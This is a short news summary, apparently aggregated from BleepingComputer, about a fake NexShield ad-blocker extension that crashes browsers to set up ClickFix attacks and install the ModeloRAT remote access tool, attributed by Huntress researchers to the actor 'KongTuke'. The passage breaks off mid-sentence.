Fake ad blocker extension crashes the browser for ClickFix attacks
BleepingComputer • • technology
Key Points:
- A malvertising campaign used a fake Chrome and Edge ad-blocking extension called NexShield that crashes browsers to prepare for ClickFix attacks, delivering a Python-based remote access tool named ModeloRAT targeting corporate environments.
- NexShield, falsely promoted as a privacy-focused ad blocker by the original uBlock Origin developer, creates a denial-of-service condition by exhausting browser memory, causing crashes and forcing users to restart their browsers.
- Upon restart, NexShield displays fake security warnings prompting users to run malicious commands that execute obfuscated PowerShell scripts, installing ModeloRAT on domain-joined corporate machines or a test payload on home devices.
- Huntress researchers link the attack to the threat actor "KongTuke," noting its increasing
